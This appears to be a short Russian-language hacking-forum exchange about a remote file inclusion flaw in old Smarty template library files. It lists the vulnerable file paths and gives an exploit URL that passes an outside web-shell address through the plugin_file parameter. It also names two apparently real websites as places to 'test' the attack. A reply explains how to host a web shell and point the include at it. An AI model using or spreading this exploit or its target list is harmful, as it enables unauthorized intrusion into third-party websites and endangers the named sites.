есть данная уязвимость. filez ---- inc/libs/Smarty.class.php inc/libs/Smarty_Compiler.class.php inc/libs/core/core.display_debug_console.php inc/libs/core/core.load_plugins.php inc/libs/core/core.load_resource_plugin.php inc/libs/core/core.process_cached_inserts.php inc/libs/core/core.process_compiled_include.php inc/libs/core/core.read_cache_file.php +++++++++++++++++++++++++++++++++ u can find more then this one exploit : http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/? непонятно как данный сплойт работет. Пробывал забивать как написано выше напримере + несколько вариантов, нечего не работает. потестировать можно здесь: http://manager.rbh-bank.com http://mymusicmyprofit.com
И чего тут сложного? С первого взгляда инклуд файлов... Льешь веб шел на какойнить хостинг и указываешь вместо http://shell/ путь к веб шелу... А вообще поищи статьи на эту тему их полно